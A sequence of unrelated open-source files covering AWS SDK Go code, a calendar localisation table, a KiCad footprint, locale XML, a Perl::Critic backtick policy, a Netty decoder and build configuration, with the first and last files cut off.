selected region. type GetVpcLinksInput struct { Template *bool TemplateSkipList []*string Title *string // The current pagination position in the paged result set. Position *string Name *string // The maximum number of returned results per page. The default value is 25 and the // maximum value is 500. Limit *int32 } // The collection of VPC links under the caller's account in a region. Getting // Started with Private Integrations // (https://docs.aws.amazon.com/apigateway/latest/developerguide/getting-started-with-private-integration.html), // Set up Private Integrations // (https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-private-integration.html) // </div> type GetVpcLinksOutput struct { // The current page of elements from this collection. Items []*types.VpcLink // The current pagination position in the paged result set. Position *string // Metadata pertaining to the operation's result. ResultMetadata middleware.Metadata } func addawsRestjson1_serdeOpGetVpcLinksMiddlewares(stack *middleware.Stack) { stack.Serialize.Add(&awsRestjson1_serializeOpGetVpcLinks{}, middleware.After) stack.Deserialize.Add(&awsRestjson1_deserializeOpGetVpcLinks{}, middleware.After) } func newServiceMetadataMiddleware_opGetVpcLinks(region string) awsmiddleware.RegisterServiceMetadata { return awsmiddleware.RegisterServiceMetadata{ Region: region, ServiceID: ServiceID, SigningName: "apigateway", OperationName: "GetVpcLinks", } }
{ "pile_set_name": "Github" }
/**! * jQuery cxCalendar Multi-Language Configure * @date 2017-7-7 * @author ciaoca * @email [email protected] * @site https://github.com/ciaoca/cxCalendar */ (function(factory) { if (typeof define === 'function' && define.amd) { define(['jquery', 'cxCalendar'], factory); } else { factory(jQuery); }; }(function($) { $.extend($.cxCalendar.languages, { // Default // 默认为中文,可以在此设定替换掉原默认语言 // 'default': { // monthList: ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12'], // weekList: ['日', '一', '二', '三', '四', '五', '六'], // holiday: [] // }, // English 'en': { monthList: ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'], weekList: ['Sun', 'Mon', 'Tur', 'Wed', 'Thu', 'Fri', 'Sat'], holiday: [] }, // Japanese 'ja': { monthList: ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12'], weekList: ['日', '月', '火', '水', '木', '金', '土'], holiday: [] }, // Chinese 'zh-cn': { monthList: ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12'], weekList: ['日', '一', '二', '三', '四', '五', '六'], holiday: [ {day: 'M1-1', name: '元旦'}, {day: 'M2-14', name: '情人节'}, {day: 'M3-5', name: '学雷锋纪念日'}, {day: 'M3-8', name: '妇女节'}, {day: 'M3-12', name: '植树节'}, {day: 'M3-14', name: '白色情人节'}, {day: 'M3-15', name: '消费者权益日'}, {day: 'M4-1', name: '愚人节'}, {day: 'M5-1', name: '劳动节'}, {day: 'M5-4', name: '青年节'}, {day: 'M6-1', name: '儿童节'}, {day: 'M8-1', name: '建党节'}, {day: 'M8-1', name: '建军节'}, {day: 'M9-10', name: '教师节'}, {day: 'M10-1', name: '国庆节'}, {day: 'M11-1', name: '万圣节'}, {day: 'M12-25', name: '圣诞节'}, {day: 'D2017-1-5', name: '腊八节'}, {day: 'D2017-1-20', name: '大寒'}, {day: 'D2017-1-27', name: '除夕'}, {day: 'D2017-1-28', name: '春节'}, {day: 'D2017-2-3', name: '立春'}, {day: 'D2017-2-11', name: '元宵节'}, {day: 'D2017-2-18', name: '雨水'}, {day: 'D2017-3-5', name: '惊蛰'}, {day: 'D2017-3-20', name: '春分'}, {day: 'D2017-4-4', name: '清明'}, {day: 'D2017-4-20', name: '谷雨'}, {day: 'D2017-5-5', name: '立夏'}, {day: 'D2017-5-14', name: '母亲节'}, {day: 'D2017-5-21', 
name: '小满'}, {day: 'D2017-5-30', name: '端午节'}, {day: 'D2017-6-5', name: '芒种'}, {day: 'D2017-6-18', name: '父亲节'}, {day: 'D2017-6-21', name: '夏至'}, {day: 'D2017-7-14', name: '小暑'}, {day: 'D2017-7-23', name: '大暑'}, {day: 'D2017-8-7', name: '立秋'}, {day: 'D2017-8-23', name: '处暑'}, {day: 'D2017-8-28', name: '七夕'}, {day: 'D2017-9-5', name: '中元节'}, {day: 'D2017-9-7', name: '白露'}, {day: 'D2017-9-23', name: '秋分'}, {day: 'D2017-10-4', name: '中秋节'}, {day: 'D2017-10-8', name: '寒露'}, {day: 'D2017-10-23', name: '霜降'}, {day: 'D2017-10-28', name: '重阳节'}, {day: 'D2017-11-7', name: '立冬'}, {day: 'D2017-11-22', name: '小雪'}, {day: 'D2017-12-7', name: '大雪'}, {day: 'D2017-12-21', name: '冬至'}, {day: 'D2018-1-5', name: '小寒'}, {day: 'D2018-1-20', name: '大寒'}, {day: 'D2018-1-24', name: '腊八节'}, {day: 'D2018-2-4', name: '立春'}, {day: 'D2018-2-15', name: '除夕'}, {day: 'D2018-2-16', name: '春节'}, {day: 'D2018-2-19', name: '雨水'}, {day: 'D2018-3-2', name: '元宵节'}, {day: 'D2018-3-5', name: '惊蛰'}, {day: 'D2018-3-21', name: '春分'}, {day: 'D2018-4-5', name: '清明'}, {day: 'D2018-4-20', name: '谷雨'}, {day: 'D2018-5-5', name: '立夏'}, {day: 'D2018-5-13', name: '母情节'}, {day: 'D2018-5-21', name: '小满'}, {day: 'D2018-6-6', name: '芒种'}, {day: 'D2018-6-17', name: '父亲节'}, {day: 'D2018-6-18', name: '端午节'}, {day: 'D2018-6-21', name: '夏至'}, {day: 'D2018-7-7', name: '小暑'}, {day: 'D2018-7-23', name: '大暑'}, {day: 'D2018-8-7', name: '立秋'}, {day: 'D2018-8-17', name: '七夕节'}, {day: 'D2018-8-23', name: '处暑'}, {day: 'D2018-8-25', name: '中元节'}, {day: 'D2018-9-8', name: '白露'}, {day: 'D2018-9-23', name: '秋分'}, {day: 'D2018-9-24', name: '中秋节'}, {day: 'D2018-10-8', name: '寒露'}, {day: 'D2018-10-17', name: '重阳节'}, {day: 'D2018-10-23', name: '霜降'}, {day: 'D2018-11-7', name: '立冬'}, {day: 'D2018-11-22', name: '小雪'}, {day: 'D2018-12-7', name: '大雪'}, {day: 'D2018-12-22', name: '冬至'}, {day: 'D2019-1-5', name: '小寒'}, {day: 'D2019-1-13', name: '腊八节'}, {day: 'D2019-1-20', name: '大寒'}, {day: 'D2019-2-4', name: '除夕'}, {day: 'D2019-2-5', name: '春节'}, 
{day: 'D2019-2-19', name: '元宵节'}, {day: 'D2019-3-6', name: '惊蛰'}, {day: 'D2019-3-21', name: '春分'}, {day: 'D2019-4-5', name: '清明'}, {day: 'D2019-4-20', name: '谷雨'}, {day: 'D2019-5-6', name: '立夏'}, {day: 'D2019-5-12', name: '母亲节'}, {day: 'D2019-5-21', name: '小满'}, {day: 'D2019-6-6', name: '芒种'}, {day: 'D2019-6-7', name: '端午节'}, {day: 'D2019-6-16', name: '父亲节'}, {day: 'D2019-6-22', name: '夏至'}, {day: 'D2019-7-5', name: '小暑'}, {day: 'D2019-7-23', name: '大暑'}, {day: 'D2019-8-8', name: '立秋'}, {day: 'D2019-8-7', name: '七夕'}, {day: 'D2019-8-15', name: '中元节'}, {day: 'D2019-8-23', name: '处暑'}, {day: 'D2019-9-8', name: '白露'}, {day: 'D2019-9-13', name: '中秋节'}, {day: 'D2019-9-23', name: '秋分'}, {day: 'D2019-10-7', name: '重阳节'}, {day: 'D2019-10-8', name: '寒露'}, {day: 'D2019-10-24', name: '霜降'}, {day: 'D2019-11-8', name: '立冬'}, {day: 'D2019-11-22', name: '小雪'}, {day: 'D2019-12-7', name: '大雪'}, {day: 'D2019-12-22', name: '冬至'}, {day: 'D2020-1-2', name: '腊八节'}, {day: 'D2020-1-6', name: '小寒'}, {day: 'D2020-1-20', name: '大寒'}, {day: 'D2020-1-24', name: '除夕'}, {day: 'D2020-1-25', name: '春节'}, {day: 'D2020-2-4', name: '立春'}, {day: 'D2020-2-8', name: '元宵节'}, {day: 'D2020-2-19', name: '雨水'}, {day: 'D2020-3-5', name: '惊蛰'}, {day: 'D2020-3-20', name: '春分'}, {day: 'D2020-4-4', name: '清明'}, {day: 'D2020-4-19', name: '谷雨'}, {day: 'D2020-5-5', name: '立夏'}, {day: 'D2020-5-10', name: '母亲节'}, {day: 'D2020-5-20', name: '小满'}, {day: 'D2020-6-5', name: '芒种'}, {day: 'D2020-6-21', name: '父亲节'}, {day: 'D2020-6-25', name: '端午节'}, {day: 'D2020-7-7', name: '小暑'}, {day: 'D2020-7-22', name: '大暑'}, {day: 'D2020-8-7', name: '立秋'}, {day: 'D2020-8-23', name: '处暑'}, {day: 'D2020-8-25', name: '七夕'}, {day: 'D2020-9-2', name: '中元节'}, {day: 'D2020-9-7', name: '白露'}, {day: 'D2020-9-22', name: '秋分'}, {day: 'D2020-10-1', name: '中秋节'}, {day: 'D2020-10-8', name: '寒露'}, {day: 'D2020-10-23', name: '霜降'}, {day: 'D2020-10-25', name: '重阳节'}, {day: 'D2020-11-7', name: '立冬'}, {day: 'D2020-11-22', name: '小雪'}, {day: 'D2020-12-6', 
name: '大雪'}, {day: 'D2020-12-21', name: '冬至'} ] } }); }));
{ "pile_set_name": "Github" }
// @ts-ignore import Pagination from './components/Pagination.vue'; // @ts-ignore import SimplePagination from './components/SimplePagination.vue'; // @ts-ignore import Comment from './components/Comment.vue'; export { Pagination, SimplePagination, Comment };
{ "pile_set_name": "Github" }
(module IDC-Header_2x32-1MP_P2.54mm_Latch9.5mm_Vertical (layer F.Cu) (tedit 5EAC9A07) (descr "Through hole IDC header, 2x32, 2.54mm pitch, DIN 41651 / IEC 60603-13, double rows, 9.5mm latches, mounting holes, https://docs.google.com/spreadsheets/d/16SsEcesNF15N3Lb4niX7dcUr-NY5_MFPQhobNuNppn4/edit#gid=0") (tags "Through hole vertical IDC header THT 2x32 2.54mm double row") (fp_text reference REF** (at 1.27 -21.47) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value IDC-Header_2x32-1MP_P2.54mm_Latch9.5mm_Vertical (at 1.27 100.21) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -3.13 -9.97) (end -2.13 -10.97) (layer F.Fab) (width 0.1)) (fp_line (start -2.13 -10.97) (end 5.67 -10.97) (layer F.Fab) (width 0.1)) (fp_line (start 5.67 -10.97) (end 5.67 89.71) (layer F.Fab) (width 0.1)) (fp_line (start 5.67 89.71) (end -3.13 89.71) (layer F.Fab) (width 0.1)) (fp_line (start -3.13 89.71) (end -3.13 -9.97) (layer F.Fab) (width 0.1)) (fp_line (start -3.13 37.32) (end -1.93 37.32) (layer F.Fab) (width 0.1)) (fp_line (start -1.93 37.32) (end -1.93 -3.92) (layer F.Fab) (width 0.1)) (fp_line (start -1.93 -3.92) (end 4.47 -3.92) (layer F.Fab) (width 0.1)) (fp_line (start 4.47 -3.92) (end 4.47 82.66) (layer F.Fab) (width 0.1)) (fp_line (start 4.47 82.66) (end -1.93 82.66) (layer F.Fab) (width 0.1)) (fp_line (start -1.93 82.66) (end -1.93 41.42) (layer F.Fab) (width 0.1)) (fp_line (start -1.93 41.42) (end -1.93 41.42) (layer F.Fab) (width 0.1)) (fp_line (start -1.93 41.42) (end -3.13 41.42) (layer F.Fab) (width 0.1)) (fp_line (start -0.93 -10.97) (end -0.93 -20.47) (layer F.Fab) (width 0.1)) (fp_line (start -0.93 -20.47) (end 3.47 -20.47) (layer F.Fab) (width 0.1)) (fp_line (start 3.47 -20.47) (end 3.47 -10.97) (layer F.Fab) (width 0.1)) (fp_line (start -0.93 89.71) (end -0.93 99.21) (layer F.Fab) (width 0.1)) (fp_line (start -0.93 99.21) (end 3.47 99.21) (layer F.Fab) (width 0.1)) (fp_line (start 3.47 99.21) (end 3.47 89.71) 
(layer F.Fab) (width 0.1)) (fp_line (start 4.91 -11.08) (end 5.78 -11.08) (layer F.SilkS) (width 0.12)) (fp_line (start 5.78 -11.08) (end 5.78 89.82) (layer F.SilkS) (width 0.12)) (fp_line (start 5.78 89.82) (end 4.91 89.82) (layer F.SilkS) (width 0.12)) (fp_line (start -2.87 -11.08) (end -3.24 -11.08) (layer F.SilkS) (width 0.12)) (fp_line (start -3.24 -11.08) (end -3.24 89.82) (layer F.SilkS) (width 0.12)) (fp_line (start -3.24 89.82) (end -2.87 89.82) (layer F.SilkS) (width 0.12)) (fp_line (start -3.24 37.32) (end -1.93 37.32) (layer F.SilkS) (width 0.12)) (fp_line (start -1.93 37.32) (end -1.93 -3.92) (layer F.SilkS) (width 0.12)) (fp_line (start -1.93 -3.92) (end 4.47 -3.92) (layer F.SilkS) (width 0.12)) (fp_line (start 4.47 -3.92) (end 4.47 82.66) (layer F.SilkS) (width 0.12)) (fp_line (start 4.47 82.66) (end -1.93 82.66) (layer F.SilkS) (width 0.12)) (fp_line (start -1.93 82.66) (end -1.93 41.42) (layer F.SilkS) (width 0.12)) (fp_line (start -1.93 41.42) (end -1.93 41.42) (layer F.SilkS) (width 0.12)) (fp_line (start -1.93 41.42) (end -3.24 41.42) (layer F.SilkS) (width 0.12)) (fp_line (start -1.04 -12.83) (end -1.04 -20.58) (layer F.SilkS) (width 0.12)) (fp_line (start -1.04 -20.58) (end 3.58 -20.58) (layer F.SilkS) (width 0.12)) (fp_line (start 3.58 -20.58) (end 3.58 -12.83) (layer F.SilkS) (width 0.12)) (fp_line (start -1.04 91.57) (end -1.04 99.32) (layer F.SilkS) (width 0.12)) (fp_line (start -1.04 99.32) (end 3.58 99.32) (layer F.SilkS) (width 0.12)) (fp_line (start 3.58 99.32) (end 3.58 91.57) (layer F.SilkS) (width 0.12)) (fp_line (start -3.63 0) (end -4.63 -0.5) (layer F.SilkS) (width 0.12)) (fp_line (start -4.63 -0.5) (end -4.63 0.5) (layer F.SilkS) (width 0.12)) (fp_line (start -4.63 0.5) (end -3.63 0) (layer F.SilkS) (width 0.12)) (fp_line (start -3.63 -20.97) (end -3.63 99.71) (layer F.CrtYd) (width 0.05)) (fp_line (start -3.63 99.71) (end 6.17 99.71) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.17 99.71) (end 6.17 -20.97) (layer F.CrtYd) 
(width 0.05)) (fp_line (start 6.17 -20.97) (end -3.63 -20.97) (layer F.CrtYd) (width 0.05)) (pad 1 thru_hole roundrect (at 0 0) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (roundrect_rratio 0.147059)) (pad 3 thru_hole circle (at 0 2.54) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 5 thru_hole circle (at 0 5.08) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 7 thru_hole circle (at 0 7.62) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 9 thru_hole circle (at 0 10.16) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 11 thru_hole circle (at 0 12.7) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 13 thru_hole circle (at 0 15.24) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 15 thru_hole circle (at 0 17.78) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 17 thru_hole circle (at 0 20.32) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 19 thru_hole circle (at 0 22.86) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 21 thru_hole circle (at 0 25.4) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 23 thru_hole circle (at 0 27.94) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 25 thru_hole circle (at 0 30.48) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 27 thru_hole circle (at 0 33.02) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 29 thru_hole circle (at 0 35.56) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 31 thru_hole circle (at 0 38.1) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 33 thru_hole circle (at 0 40.64) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 35 thru_hole circle (at 0 43.18) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 37 thru_hole circle (at 0 45.72) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 39 thru_hole circle (at 0 48.26) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 41 thru_hole circle (at 0 50.8) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 43 thru_hole circle (at 0 53.34) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 45 thru_hole 
circle (at 0 55.88) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 47 thru_hole circle (at 0 58.42) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 49 thru_hole circle (at 0 60.96) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 51 thru_hole circle (at 0 63.5) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 53 thru_hole circle (at 0 66.04) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 55 thru_hole circle (at 0 68.58) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 57 thru_hole circle (at 0 71.12) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 59 thru_hole circle (at 0 73.66) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 61 thru_hole circle (at 0 76.2) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 63 thru_hole circle (at 0 78.74) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 2 thru_hole circle (at 2.54 0) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 4 thru_hole circle (at 2.54 2.54) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 6 thru_hole circle (at 2.54 5.08) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 8 thru_hole circle (at 2.54 7.62) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 10 thru_hole circle (at 2.54 10.16) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 12 thru_hole circle (at 2.54 12.7) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 14 thru_hole circle (at 2.54 15.24) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 16 thru_hole circle (at 2.54 17.78) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 18 thru_hole circle (at 2.54 20.32) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 20 thru_hole circle (at 2.54 22.86) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 22 thru_hole circle (at 2.54 25.4) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 24 thru_hole circle (at 2.54 27.94) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 26 thru_hole circle (at 2.54 30.48) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 28 thru_hole circle (at 2.54 
33.02) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 30 thru_hole circle (at 2.54 35.56) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 32 thru_hole circle (at 2.54 38.1) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 34 thru_hole circle (at 2.54 40.64) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 36 thru_hole circle (at 2.54 43.18) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 38 thru_hole circle (at 2.54 45.72) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 40 thru_hole circle (at 2.54 48.26) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 42 thru_hole circle (at 2.54 50.8) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 44 thru_hole circle (at 2.54 53.34) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 46 thru_hole circle (at 2.54 55.88) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 48 thru_hole circle (at 2.54 58.42) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 50 thru_hole circle (at 2.54 60.96) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 52 thru_hole circle (at 2.54 63.5) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 54 thru_hole circle (at 2.54 66.04) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 56 thru_hole circle (at 2.54 68.58) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 58 thru_hole circle (at 2.54 71.12) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 60 thru_hole circle (at 2.54 73.66) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 62 thru_hole circle (at 2.54 76.2) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 64 thru_hole circle (at 2.54 78.74) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad MP thru_hole circle (at 1.02 -8.94) (size 8 8) (drill 2.69) (layers *.Cu *.Mask)) (pad MP thru_hole circle (at 1.02 87.68) (size 8 8) (drill 2.69) (layers *.Cu *.Mask)) (fp_text user %R (at 1.27 39.37 90) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (model 
${KISYS3DMOD}/Connector_IDC.3dshapes/IDC-Header_2x32-1MP_P2.54mm_Latch9.5mm_Vertical.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) )
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE ldml SYSTEM "../../common/dtd/ldml.dtd"> <ldml> <identity> <version number="$Revision: 5798 $"/> <generation date="$Date: 2011-05-02 15:05:34 +0900 (Mon, 02 May 2011) $"/> <language type="teo"/> <territory type="KE"/> </identity> <numbers> <currencies> <currency type="KES"> <symbol>Ksh</symbol> </currency> </currencies> </numbers> </ldml>
{ "pile_set_name": "Github" }
{ "exclude": { "self": [ { "id": "Q20081432", "name": "deputy of Bolivia" } ], "other": [ ] }, "include": { "self": [ { "id": "Q20081427", "name": "senator of Bolivia" } ], "other_legislatures": [ ], "executive": [ ], "party": [ ], "other": [ ] }, "unknown": { "unknown": [ ] } }
{ "pile_set_name": "Github" }
package Perl::Critic::Policy::InputOutput::ProhibitBacktickOperators;

use 5.006001;
use strict;
use warnings;
use Readonly;

use Perl::Critic::Utils qw{ :severities is_in_void_context };
use base 'Perl::Critic::Policy';

our $VERSION = '1.139_01';

#-----------------------------------------------------------------------------

Readonly::Scalar my $EXPL => q{Use IPC::Open3 instead};
Readonly::Scalar my $DESC => q{Backtick operator used};

Readonly::Scalar my $VOID_EXPL => q{Assign result to a variable or use system() instead};
Readonly::Scalar my $VOID_DESC => q{Backtick operator used in void context};

#-----------------------------------------------------------------------------

sub supported_parameters {
    return (
        {
            name        => 'only_in_void_context',
            description => 'Allow backticks everywhere except in void contexts.',
            behavior    => 'boolean',
        },
    );
}

sub default_severity { return $SEVERITY_MEDIUM                    }
sub default_themes   { return qw(core maintenance)                }
sub applies_to       { return qw(PPI::Token::QuoteLike::Backtick
                                 PPI::Token::QuoteLike::Command ) }

#-----------------------------------------------------------------------------

sub violates {
    my ( $self, $elem, undef ) = @_;

    # In restricted mode, only complain about backticks whose result is
    # discarded (void context); otherwise flag every use.
    if ( $self->{_only_in_void_context} ) {
        return if not is_in_void_context( $elem );
        return $self->violation( $VOID_DESC, $VOID_EXPL, $elem );
    }

    return $self->violation( $DESC, $EXPL, $elem );
}

1;

__END__

#-----------------------------------------------------------------------------

=pod

=for stopwords perlipc

=head1 NAME

Perl::Critic::Policy::InputOutput::ProhibitBacktickOperators - Discourage stuff like C<@files = `ls $directory`>.

=head1 AFFILIATION

This Policy is part of the core L<Perl::Critic|Perl::Critic>
distribution.

=head1 DESCRIPTION

Backticks are super-convenient, especially for CGI programs, but I
find that they make a lot of noise by filling up STDERR with messages
when they fail.  I think it's better to use IPC::Open3 to trap all the
output and let the application decide what to do with it.

    use IPC::Open3 'open3';
    $SIG{CHLD} = 'IGNORE';

    @output = `some_command`;                      #not ok

    my ($writer, $reader, $err);
    open3($writer, $reader, $err, 'some_command'); #ok;
    @output = <$reader>;  #Output here
    @errors = <$err>;     #Errors here, instead of the console

=head1 CONFIGURATION

Alternatively, if you do want to use backticks, you can restrict
checks to void contexts by adding the following to your
F<.perlcriticrc> file:

    [InputOutput::ProhibitBacktickOperators]
    only_in_void_context = 1

The purpose of backticks is to capture the output of an external
command.  Use of them in a void context is likely a bug.  If the
output isn't actually required, C<system()> should be used.  Otherwise
assign the result to a variable.

    `some_command`;                  #not ok
    $output = `some_command`;        #ok
    @output = `some_command`;        #ok

=head1 NOTES

This policy also prohibits the generalized form of backticks seen as
C<qx{}>.

See L<perlipc|perlipc> for more discussion on using C<wait()> instead
of C<$SIG{CHLD} = 'IGNORE'>.

You might consider using the C<capture()> function from the
L<IPC::System::Simple|IPC::System::Simple> module for a safer way of
doing what backticks do, especially on Windows.  The module also has a
safe wrapper around C<system()>.

=head1 AUTHOR

Jeffrey Ryan Thalhammer <[email protected]>

=head1 COPYRIGHT

Copyright (c) 2005-2011 Imaginative Software Systems.  All rights
reserved.

This program is free software; you can redistribute it and/or modify
it under the same terms as Perl itself.  The full text of this license
can be found in the LICENSE file included with this module.

=cut

# Local Variables:
#   mode: cperl
#   cperl-indent-level: 4
#   fill-column: 78
#   indent-tabs-mode: nil
#   c-indentation-style: bsd
# End:
# ex: set ts=8 sts=4 sw=4 tw=78 ft=perl expandtab shiftround :
{ "pile_set_name": "Github" }
package nia.chapter10;

import io.netty.buffer.ByteBuf;
import io.netty.channel.ChannelHandlerContext;
import io.netty.handler.codec.ReplayingDecoder;

import java.util.List;

/**
 * Listing 10.2 Class ToIntegerDecoder2 extends ReplayingDecoder
 *
 * Reads one 4-byte int per decode call and passes it downstream.
 * ReplayingDecoder takes care of the "not enough bytes yet" case,
 * so no explicit readableBytes() check is needed here.
 *
 * @author <a href="mailto:[email protected]">Norman Maurer</a>
 */
public class ToIntegerDecoder2 extends ReplayingDecoder<Void> {

    @Override
    public void decode(ChannelHandlerContext ctx, ByteBuf in,
                       List<Object> out) throws Exception {
        // Replaying machinery re-invokes decode() once 4 bytes are buffered.
        out.add(in.readInt());
    }
}
{ "pile_set_name": "Github" }
/* Localized versions of Info.plist keys */
{ "pile_set_name": "Github" }
/*
Copyright (c) 2003-2015, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/

// Localization strings for the "horizontalrule" plugin, language code "sq".
CKEDITOR.plugins.setLang( 'horizontalrule', 'sq', {
	toolbar: 'Vendos Vijë Horizontale'
} );
{ "pile_set_name": "Github" }
<Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> <PackageId>Microsoft.Orleans.Persistence.AzureStorage</PackageId> <Title>Microsoft Orleans Persistence Azure Storage</Title> <Description>Microsoft Orleans persistence providers for Azure Storage</Description> <PackageTags>$(PackageTags) Azure Table Blob Storage</PackageTags> <TargetFrameworks>$(StandardTargetFrameworks)</TargetFrameworks> </PropertyGroup> <PropertyGroup> <AssemblyName>Orleans.Persistence.AzureStorage</AssemblyName> <RootNamespace>Orleans.Persistence.AzureStorage</RootNamespace> <OrleansBuildTimeCodeGen>true</OrleansBuildTimeCodeGen> <DefineConstants>$(DefineConstants);ORLEANS_PERSISTENCE</DefineConstants> </PropertyGroup> <ItemGroup> <Compile Include="..\Shared\Storage\AzureBlobUtils.cs" Link="Storage\AzureBlobUtils.cs" /> <Compile Include="..\Shared\Storage\AzureStorageOperationOptions.cs" Link="Storage\AzureStorageOperationOptions.cs" /> <Compile Include="..\Shared\Storage\AzureStoragePolicyOptions.cs" Link="Storage\AzureStoragePolicyOptions.cs" /> <Compile Include="..\Shared\Storage\AzureTableDataManager.cs" Link="Storage\AzureTableDataManager.cs" /> <Compile Include="..\Shared\Storage\AzureTableUtils.cs" Link="Storage\AzureTableUtils.cs" /> <Compile Include="..\Shared\Utilities\ErrorCode.cs" Link="Utilities\ErrorCode.cs" /> </ItemGroup> <ItemGroup> <PackageReference Include="Microsoft.Azure.Cosmos.Table" Version="$(MicrosoftAzureCosmosTableVersion)" /> <PackageReference Include="Azure.Core" Version="$(AzureCoreVersion)" /> <PackageReference Include="Azure.Storage.Blobs" Version="$(AzureStorageBlobsVersion)" /> <PackageReference Include="System.Net.NameResolution" Version="$(SystemNetNameResolutionVersion)" /> </ItemGroup> </Project>
{ "pile_set_name": "Github" }
/* encode2Meta - Create meta files.. */
/* Copyright (C) 2013 The Regents of the University of California
 * See README in this or parent directory for licensing information. */
#include "common.h"
#include "linefile.h"
#include "hash.h"
#include "options.h"
#include "encode/encodeExp.h"
#include "encode3/encode2Manifest.h"
#include "mdb.h"

char *metaDbs[] = {"hg19", "mm9"};
char *organisms[] = {"human", "mouse"};
char *metaTable = "metaDb";
char *expDb = "hgFixed";
char *expTable = "encodeExp";

/* Command line variables */
boolean withParent = FALSE;
boolean maniFields = FALSE;

void usage()
/* Explain usage and exit. */
{
errAbort(
"encode2Meta - Create meta.txt file. This is a hierarchical .ra file with hierarchy defined\n"
"by indentation. You might think of it as a meta tag tree. It contains the contents of\n"
"the hg19 and mm9 metaDb tables and the hgFixed.encodeExp table.\n"
"usage:\n"
"   encode2Meta database manifest.tab meta.txt\n"
"options:\n"
"   -withParent - if set put a parent tag in each stanza in addition to indentation\n"
"   -maniFields - includes some fields normally suppressed because they are also in manifest\n"
);
}

/* Command line validation table. */
static struct optionSpec options[] = {
